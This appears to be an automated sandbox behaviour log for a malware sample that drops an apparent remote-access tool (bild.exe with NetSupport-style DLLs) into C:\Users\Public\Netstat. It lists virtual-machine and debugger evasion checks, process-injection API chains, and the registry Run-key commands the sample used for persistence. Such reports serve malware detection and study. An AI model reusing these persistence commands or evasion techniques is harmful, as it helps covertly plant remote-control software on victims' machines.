Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Dropped PE file which has not been started: C:\Users\Public\Netstat\remcmdstub.exe	Jump to dropped file
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Dropped PE file which has not been started: C:\Users\Public\Netstat\HTCTL32.DLL	Jump to dropped file

Source: C:\Users\Public\Netstat\bild.exe	Evaded block: after key decision	graph_6-94526
Source: C:\Users\Public\Netstat\bild.exe	Evaded block: after key decision	graph_6-95728
Source: C:\Users\Public\Netstat\bild.exe	Evaded block: after key decision	graph_6-96411
Source: C:\Users\Public\Netstat\bild.exe	Evaded block: after key decision	graph_6-99654
Source: C:\Users\Public\Netstat\bild.exe	Evaded block: after key decision	graph_6-100053
Source: C:\Users\Public\Netstat\bild.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\bild.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\bild.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\bild.exe	Evaded block: after key decision
Source: C:\Users\Public\Netstat\bild.exe	Evaded block: after key decision

Source: C:\Users\Public\Netstat\bild.exe	Evasive API call chain: GetSystemTimeAsFileTime,DecisionNodes
Source: C:\Users\Public\Netstat\bild.exe	Evasive API call chain: GetLocalTime,DecisionNodes			graph_6-99793

Source: C:\Users\Public\Netstat\bild.exe

Check user administrative privileges: GetTokenInformation,DecisionNodes

graph_6-99494

Source: C:\Users\Public\Netstat\bild.exe	API coverage: 6.0 %
Source: C:\Users\Public\Netstat\bild.exe	API coverage: 2.6 %

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_6C5E4F30

6_2_6C5E4F30

Source: C:\Users\Public\Netstat\bild.exe TID: 7260

Thread sleep time: -93700s >= -30000s

Jump to behavior

Source: C:\Users\Public\Netstat\bild.exe

WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_ComputerSystem

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Users\Public\Netstat\bild.exe	Last function: Thread delayed

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_6C5E3130 GetSystemTime followed by cmp: cmp eax, 02h and CTI: je 6C5E3226h

6_2_6C5E3130

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003CA273 FindFirstFileW,FindFirstFileW,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,	0_2_003CA273
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003DA537 SendDlgItemMessageW,EndDialog,GetDlgItem,SetFocus,SetDlgItemTextW,SetDlgItemTextW,SendDlgItemMessageW,FindFirstFileW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,FindClose,_swprintf,SetDlgItemTextW,SendDlgItemMessageW,FileTimeToLocalFileTime,FileTimeToSystemTime,GetTimeFormatW,GetDateFormatW,_swprintf,SetDlgItemTextW,_swprintf,SetDlgItemTextW,	0_2_003DA537
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003E7D78 FindFirstFileExA,	0_2_003E7D78
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	6_2_1102D330
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	6_2_11065890
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	6_2_1106A0A0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	6_2_111266E0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	6_2_1110AFD0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1102D330 InterlockedIncrement,Sleep,Sleep,GetCurrentProcess,SetPriorityClass,SetEvent,Sleep,PostThreadMessageA,PostThreadMessageA,CloseHandle,_free,_free,GetModuleFileNameA,GetFileAttributesA,_memset,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,ExitWindowsEx,ExitWindowsEx,Sleep,ExitWindowsEx,Sleep,ExitProcess,	7_2_1102D330
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11065890 _memset,_memmove,_strncpy,CharUpperA,FindFirstFileA,FindNextFileA,FindClose,wsprintfA,	7_2_11065890
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1106A0A0 GetTickCount,OpenPrinterA,StartDocPrinterA,ClosePrinter,FindFirstFileA,FindClose,CreateFileA,SetFilePointer,GetTickCount,GetLastError,	7_2_1106A0A0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_111266E0 _memset,_memset,GetVersionExA,GetTempPathA,GetModuleFileNameA,_strrchr,CreateFileA,CreateFileA,WriteFile,CloseHandle,CloseHandle,CreateFileA,GetCurrentProcessId,wsprintfA,CreateProcessA,CloseHandle,CloseHandle,CloseHandle,CreateProcessA,DeleteFileA,Sleep,WaitForSingleObject,CloseHandle,GetCurrentProcess,RemoveDirectoryA,GetLastError,ExitProcess,FindNextFileA,FindClose,FindFirstFileA,GetCurrentProcess,GetCurrentProcess,DuplicateHandle,GetModuleFileNameA,_strrchr,_memmove,GetThreadContext,VirtualProtectEx,WriteProcessMemory,FlushInstructionCache,SetThreadContext,ResumeThread,CloseHandle,CloseHandle,	7_2_111266E0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1110AFD0 _memset,wsprintfA,wsprintfA,KillTimer,FindFirstFileA,wsprintfA,FindNextFileA,GetLastError,FindClose,	7_2_1110AFD0

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Code function: 0_2_003DC8D5 VirtualQuery,GetSystemInfo,

0_2_003DC8D5

Source: HTCTL32.DLL.0.dr	Binary or memory string: VMware
Source: bild.exe, 00000006.00000002.3900058825.000000006C610000.00000002.00000001.01000000.0000000E.sdmp	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.claal*
Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000002.2050597046.0000000000D19000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: HTCTL32.DLL.0.dr	Binary or memory string: hbuf->datahttputil.c%5d000000000002004C4F4F50VirtualVMwareVIRTNETGetAdaptersInfoiphlpapi.dllcbMacAddress == MAX_ADAPTER_ADDRESS_LENGTHmacaddr.cpp,%02x%02x%02x%02x%02x%02x* Netbiosnetapi32.dll01234567890abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZwhoa nelly, says Sherman, the Sharkhellooo nurse!kernel32.dllProcessIdToSessionId%s_L%d_%xNOT copied to diskcopied to %sAssert failed - Unhandled Exception (GPF) -
Source: TCCTL32.DLL.0.dr	Binary or memory string: skt%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllGetAdaptersInfoIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlTCREMOTETCBRIDGE%s=%s
Source: bild.exe, 00000006.00000003.2362346537.0000000005799000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899523312.0000000005799000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3898582655.0000000001135000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000003.2362426992.0000000001135000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bild.exe, 0000000A.00000003.2324800216.0000000000810000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll&
Source: HTCTL32.DLL.0.dr	Binary or memory string: plist<T> too longp.secondQueueQueueThreadEventidata->Q.size () == 0p < ep%dWSAIoctlclosesocketsocketWSACleanupWSAStartupws2_32.dllIPHLPAPI.DLLVMWarevirtGetAdaptersAddressesVMWarevirtntohlWinHttpCloseHandleWinHttpGetProxyForUrlNS247WinHttpOpenWinHttpGetIEProxyConfigForCurrentUserwinhttp.dllc != '\0'dstbufyenc.cla
Source: TCCTL32.DLL.0.dr	Binary or memory string: VMWare
Source: bild.exe, 00000006.00000002.3898386960.000000000104E000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAWh
Source: bild.exe, 00000007.00000003.2162083613.00000000007A2000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000009.00000003.2243682980.000000000131F000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	API call chain: ExitProcess graph end node	graph_0-22642
Source: C:\Users\Public\Netstat\bild.exe	API call chain: ExitProcess graph end node	graph_6-94594
Source: C:\Users\Public\Netstat\bild.exe	API call chain: ExitProcess graph end node	graph_6-99512
Source: C:\Users\Public\Netstat\bild.exe	API call chain: ExitProcess graph end node	graph_6-95226
Source: C:\Users\Public\Netstat\bild.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\bild.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\bild.exe	API call chain: ExitProcess graph end node
Source: C:\Users\Public\Netstat\bild.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Code function: 0_2_003DDA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_003DDA75

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_11147750 GetLastError,wsprintfA,OutputDebugStringA,OutputDebugStringA,OutputDebugStringA,SetLastError,GetKeyState,

6_2_11147750

Source: C:\Users\Public\Netstat\bild.exe

6_2_11029590

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Code function: 0_2_003E4A5A mov eax, dword ptr fs:[00000030h]

0_2_003E4A5A

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Code function: 0_2_003E8AAA GetProcessHeap,

0_2_003E8AAA

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003DDA75 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_003DDA75
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003E5B53 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	0_2_003E5B53
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003DDBC3 SetUnhandledExceptionFilter,	0_2_003DDBC3
Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: 0_2_003DDD7C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	0_2_003DDD7C
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	6_2_11093080
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,	6_2_110310C0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_11161D01
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_1116DD89
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5F28E1 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	6_2_6C5F28E1
Source: C:\Users\Public\Netstat\bild.exe	Code function: 6_2_6C5F87F5 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	6_2_6C5F87F5
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11093080 _NSMFindClass@12,SetUnhandledExceptionFilter,OpenEventA,FindWindowA,SetForegroundWindow,CreateEventA,CloseHandle,	7_2_11093080
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_110310C0 _NSMClient32@8,SetUnhandledExceptionFilter,	7_2_110310C0
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_11161D01 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	7_2_11161D01
Source: C:\Users\Public\Netstat\bild.exe	Code function: 7_2_1116DD89 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	7_2_1116DD89

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_110F4560 GetTickCount,LogonUserA,GetTickCount,GetLastError,

6_2_110F4560

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_1111FCA0 GetForegroundWindow,GetClassNameA,GetWindowTextA,keybd_event,keybd_event,keybd_event,

6_2_1111FCA0

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\Public\Netstat\netsup.bat" "	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Netstat" /t REG_SZ /F /D "C:\Users\Public\Netstat\bild.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\Public\Netstat\bild.exe C:\Users\Public\Netstat\bild.exe	Jump to behavior

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_1109E190 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,GetVersionExA,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,FreeLibrary,CreateFileMappingA,GetLastError,LocalFree,LocalFree,LocalFree,GetLastError,MapViewOfFile,LocalFree,LocalFree,LocalFree,GetModuleFileNameA,GetModuleFileNameA,LocalFree,LocalFree,LocalFree,_memset,GetTickCount,GetCurrentProcessId,GetModuleFileNameA,CreateEventA,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,CreateEventA,GetLastError,GetLastError,GetLastError,LocalFree,LocalFree,LocalFree,GetCurrentThreadId,CreateThread,ResetEvent,ResetEvent,ResetEvent,ResetEvent,SetEvent,

6_2_1109E190

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_1109E910 GetTokenInformation,GetTokenInformation,GetTokenInformation,AllocateAndInitializeSid,EqualSid,

6_2_1109E910

Source: d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe, 00000000.00000003.2043843074.0000000004E05000.00000004.00000020.00020000.00000000.sdmp, bild.exe, 00000006.00000002.3899745986.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Shell_TrayWndunhandled plugin data, id=%d
Source: bild.exe, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Shell_TrayWnd
Source: bild.exe, bild.exe, 00000007.00000002.2163882483.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 00000009.00000002.2251909332.0000000011193000.00000002.00000001.01000000.0000000A.sdmp, bild.exe, 0000000A.00000002.2325715339.0000000011193000.00000002.00000001.01000000.0000000A.sdmp	Binary or memory string: Progman

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Code function: 0_2_003DD8CB cpuid

0_2_003DD8CB

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe	Code function: GetLocaleInfoW,GetNumberFormatW,	0_2_003D932F
Source: C:\Users\Public\Netstat\bild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_11173A35
Source: C:\Users\Public\Netstat\bild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	6_2_11173D69
Source: C:\Users\Public\Netstat\bild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_11173CC6
Source: C:\Users\Public\Netstat\bild.exe	Code function: GetLocaleInfoA,	6_2_1116B38E
Source: C:\Users\Public\Netstat\bild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_11173933
Source: C:\Users\Public\Netstat\bild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_111739DA
Source: C:\Users\Public\Netstat\bild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_1117383E
Source: C:\Users\Public\Netstat\bild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_11173D2D
Source: C:\Users\Public\Netstat\bild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_11173C06
Source: C:\Users\Public\Netstat\bild.exe	Code function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,	6_2_6C60DC56
Source: C:\Users\Public\Netstat\bild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	6_2_6C601CC1
Source: C:\Users\Public\Netstat\bild.exe	Code function: GetLocaleInfoA,	6_2_6C60DC99
Source: C:\Users\Public\Netstat\bild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	6_2_6C601DB6
Source: C:\Users\Public\Netstat\bild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	6_2_6C601E5D
Source: C:\Users\Public\Netstat\bild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	6_2_6C601EB8
Source: C:\Users\Public\Netstat\bild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,	6_2_6C600F39
Source: C:\Users\Public\Netstat\bild.exe	Code function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,	6_2_6C5FFAE1
Source: C:\Users\Public\Netstat\bild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,	6_2_6C60DB7C
Source: C:\Users\Public\Netstat\bild.exe	Code function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,	6_2_6C601680
Source: C:\Users\Public\Netstat\bild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	6_2_6C602089
Source: C:\Users\Public\Netstat\bild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_6C602175
Source: C:\Users\Public\Netstat\bild.exe	Code function: EnumSystemLocalesA,	6_2_6C602151
Source: C:\Users\Public\Netstat\bild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	6_2_6C6021DC
Source: C:\Users\Public\Netstat\bild.exe	Code function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,	6_2_6C601257
Source: C:\Users\Public\Netstat\bild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	6_2_6C602218
Source: C:\Users\Public\Netstat\bild.exe	Code function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,	6_2_6C6002AD
Source: C:\Users\Public\Netstat\bild.exe	Code function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,	7_2_11173D69
Source: C:\Users\Public\Netstat\bild.exe	Code function: GetLocaleInfoA,	7_2_1116B38E
Source: C:\Users\Public\Netstat\bild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,	7_2_11173933
Source: C:\Users\Public\Netstat\bild.exe	Code function: GetLocaleInfoW,_GetPrimaryLen,_strlen,	7_2_111739DA
Source: C:\Users\Public\Netstat\bild.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	7_2_1117383E
Source: C:\Users\Public\Netstat\bild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,	7_2_11173A35
Source: C:\Users\Public\Netstat\bild.exe	Code function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_11173D2D
Source: C:\Users\Public\Netstat\bild.exe	Code function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,	7_2_11173C06
Source: C:\Users\Public\Netstat\bild.exe	Code function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,	7_2_11173CC6

Source: C:\Users\Public\Netstat\bild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\Public\Netstat\bild.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_110F33F0 LocalAlloc,InitializeSecurityDescriptor,SetSecurityDescriptorDacl,CreateNamedPipeA,GetLastError,Sleep,CreateNamedPipeA,LocalFree,

6_2_110F33F0

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

Code function: 0_2_003DC131 GetCommandLineW,OpenFileMappingW,MapViewOfFile,UnmapViewOfFile,CloseHandle,GetModuleFileNameW,SetEnvironmentVariableW,SetEnvironmentVariableW,GetLocalTime,_swprintf,SetEnvironmentVariableW,GetModuleHandleW,LoadIconW,DialogBoxParamW,Sleep,DeleteObject,DeleteObject,DeleteObject,CloseHandle,

0_2_003DC131

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_1103B160 SHGetFolderPathA,GetUserNameA,DeleteFileA,_sprintf,_fputs,_free,GetFileAttributesA,SetFileAttributesA,

6_2_1103B160

Source: C:\Users\Public\Netstat\bild.exe

Code function: 6_2_11174AE9 __lock,____lc_codepage_func,__getenv_helper_nolock,_free,_strlen,__malloc_crt,_strlen,_strcpy_s,__invoke_watson,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,WideCharToMultiByte,SetOaNoCache,

6_2_11174AE9

Source: C:\Users\user\Desktop\d1c701d984c5e04b42f3cb7165fc8907dd9f46e91e14d.exe

